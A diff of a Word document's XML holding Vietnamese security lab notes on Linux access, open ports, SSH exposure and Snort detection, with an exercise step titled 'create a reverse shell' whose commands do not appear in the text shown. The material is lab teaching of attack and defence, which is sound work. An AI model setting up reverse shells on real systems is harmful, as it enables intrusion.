+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5486400" cy="904240"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
         <w:t>Các bước thực hiện:</w:t>
       </w:r>
     </w:p>
@@ -1040,6 +1197,7 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>su root</w:t>
       </w:r>
     </w:p>
@@ -1061,7 +1219,6 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A3D2F6E" wp14:editId="241C8D04">
             <wp:extent cx="5486400" cy="801370"/>
@@ -1078,7 +1235,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId14"/>
+                    <a:blip r:embed="rId18"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1133,7 +1290,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId15"/>
+                    <a:blip r:embed="rId19"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1276,6 +1433,7 @@
         </w:rPr>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">+ Chuyển đổi phương thức xác thực: Vô hiệu hóa hoàn toàn việc đăng nhập bằng mật khẩu đối với các dịch vụ mạng. Thay vào đó, bắt buộc sử dụng </w:t>
       </w:r>
       <w:r>
@@ -1298,7 +1456,6 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>LAB 5 - Networking</w:t>
       </w:r>
     </w:p>
@@ -1309,6 +1466,45 @@
       <w:r>
         <w:br/>
         <w:t>Kiểm tra IP và port</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1357F331" wp14:editId="68610F28">
+            <wp:extent cx="5486400" cy="871220"/>
+            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
+            <wp:docPr id="458537939" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="458537939" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId20"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5486400" cy="871220"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
       </w:r>
     </w:p>
     <w:p>
@@ -1331,6 +1527,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A501BE3" wp14:editId="3EF71CD1">
             <wp:extent cx="5486400" cy="2454910"/>
@@ -1347,7 +1546,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId16"/>
+                    <a:blip r:embed="rId21"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1383,6 +1582,10 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="471D1628" wp14:editId="51A3AC67">
             <wp:extent cx="5486400" cy="1666875"/>
@@ -1399,7 +1602,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId17"/>
+                    <a:blip r:embed="rId22"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1441,7 +1644,9 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:lastRenderedPageBreak/>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C73ECE1" wp14:editId="6EAF27CA">
             <wp:extent cx="5486400" cy="2351405"/>
@@ -1458,7 +1663,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId18"/>
+                    <a:blip r:embed="rId23"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1494,6 +1699,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75A74D83" wp14:editId="63761A5E">
             <wp:extent cx="5486400" cy="567055"/>
@@ -1510,7 +1718,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId19"/>
+                    <a:blip r:embed="rId24"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1572,6 +1780,7 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>Lệnh quan trọng nhất là ss -tulnp, giúp thấy những cổng mở, giao thức đang sử dụng và tiến trình đang chạy sau port đó</w:t>
       </w:r>
       <w:r>
@@ -1616,7 +1825,6 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>Rủi ro lớn nhất nằm ở các port đang mở ra môi trường public, đặc biệt là port 22 (SSH)</w:t>
       </w:r>
       <w:r>
@@ -1683,6 +1891,45 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FBFF7BA" wp14:editId="2FD9250B">
+            <wp:extent cx="5486400" cy="1242060"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="99614331" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="99614331" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId25"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5486400" cy="1242060"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
         <w:t>Các bước thực hiện:</w:t>
       </w:r>
     </w:p>
@@ -1717,6 +1964,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>Bước 3: Tạo reverse shell</w:t>
       </w:r>
     </w:p>
@@ -1749,8 +1997,8 @@
         <w:rPr>
           <w:b/>
           <w:bCs/>
+          <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24000284" wp14:editId="02979C62">
             <wp:extent cx="5486400" cy="4627245"/>
@@ -1767,7 +2015,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId20"/>
+                    <a:blip r:embed="rId26"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1803,6 +2051,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="680AECFA" wp14:editId="063231D4">
             <wp:extent cx="4858428" cy="1467055"/>
@@ -1819,7 +2070,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId21"/>
+                    <a:blip r:embed="rId27"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1842,6 +2093,7 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>Kết quả mong đợi:</w:t>
       </w:r>
     </w:p>
@@ -1876,7 +2128,6 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>- Command nào quan trọng nhất?</w:t>
       </w:r>
     </w:p>
@@ -2009,7 +2260,11 @@
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:t>thường truyền dữ liệu dưới dạng plain-text không mã hóa, Snort có thể dễ dàng bắt được các signature của dòng lệnh Linux chạy qua đường mạng để cảnh báo hoặc drop ngay gói tin</w:t>
+        <w:t xml:space="preserve">thường truyền dữ liệu dưới dạng plain-text không mã hóa, Snort có thể </w:t>
+      </w:r>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>dễ dàng bắt được các signature của dòng lệnh Linux chạy qua đường mạng để cảnh báo hoặc drop ngay gói tin</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2022,7 +2277,6 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>Challenge Tổng Hợp</w:t>
       </w:r>
     </w:p>
@@ -2056,6 +2310,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F8574DD" wp14:editId="059A0D5F">
             <wp:extent cx="5486400" cy="2700655"/>
@@ -2072,7 +2329,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId22"/>
+                    <a:blip r:embed="rId28"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2119,7 +2376,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId23"/>
+                    <a:blip r:embed="rId29"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2150,6 +2407,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E947A11" wp14:editId="5A2D7AD7">
             <wp:extent cx="5486400" cy="1687195"/>
@@ -2166,7 +2424,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId24"/>
+                    <a:blip r:embed="rId30"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2197,7 +2455,6 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3DA450FC" wp14:editId="7EDD4ACF">
             <wp:extent cx="5486400" cy="1825625"/>
@@ -2214,7 +2471,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId25"/>
+                    <a:blip r:embed="rId31"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2242,6 +2499,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75818776" wp14:editId="0536BC3F">
             <wp:extent cx="3715268" cy="724001"/>
@@ -2258,7 +2518,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId26"/>
+                    <a:blip r:embed="rId32"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2292,6 +2552,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="432591C8" wp14:editId="1C684913">
             <wp:extent cx="5486400" cy="1797685"/>
@@ -2308,7 +2571,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId27"/>
+                    <a:blip r:embed="rId33"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2336,6 +2599,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CA0CD3B" wp14:editId="36851ED1">
@@ -2353,7 +2619,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId28"/>
+                    <a:blip r:embed="rId34"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2381,6 +2647,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63FDCC55" wp14:editId="730127CB">
             <wp:extent cx="5486400" cy="466725"/>
@@ -2397,7 +2666,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId29"/>
+                    <a:blip r:embed="rId35"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2425,6 +2694,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00E151CD" wp14:editId="08DA4741">
             <wp:extent cx="5486400" cy="832485"/>
@@ -2441,7 +2713,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId30"/>
+                    <a:blip r:embed="rId36"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2469,6 +2741,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7484023A" wp14:editId="0756552C">
             <wp:extent cx="4572638" cy="619211"/>
@@ -2485,7 +2760,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId31"/>
+                    <a:blip r:embed="rId37"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2513,6 +2788,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C4F1863" wp14:editId="14BAC6C2">
             <wp:extent cx="5486400" cy="793115"/>
@@ -2529,7 +2807,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId32"/>
+                    <a:blip r:embed="rId38"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2698,7 +2976,7 @@
   <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="FFFFFF88"/>
     <w:multiLevelType w:val="singleLevel"/>
-    <w:tmpl w:val="140A30BC"/>
+    <w:tmpl w:val="26BA078A"/>
     <w:lvl w:ilvl="0">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
@@ -2716,7 +2994,7 @@
   <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="FFFFFF89"/>
     <w:multiLevelType w:val="singleLevel"/>
-    <w:tmpl w:val="FD54335C"/>
+    <w:tmpl w:val="A4943210"/>
     <w:lvl w:ilvl="0">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
@@ -2765,6 +3043,24 @@
     <w:abstractNumId w:val="7"/>
   </w:num>
   <w:num w:numId="11" w16cid:durableId="773551852">
+    <w:abstractNumId w:val="7"/>
+  </w:num>
+  <w:num w:numId="12" w16cid:durableId="504824347">
+    <w:abstractNumId w:val="7"/>
+  </w:num>
+  <w:num w:numId="13" w16cid:durableId="45683124">
+    <w:abstractNumId w:val="7"/>
+  </w:num>
+  <w:num w:numId="14" w16cid:durableId="1981180500">
+    <w:abstractNumId w:val="7"/>
+  </w:num>
+  <w:num w:numId="15" w16cid:durableId="1435593551">
+    <w:abstractNumId w:val="7"/>
+  </w:num>
+  <w:num w:numId="16" w16cid:durableId="1992829186">
+    <w:abstractNumId w:val="7"/>
+  </w:num>
+  <w:num w:numId="17" w16cid:durableId="260646133">
     <w:abstractNumId w:val="7"/>
   </w:num>
 </w:numbering>
@@ -3373,6 +3669,7 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">
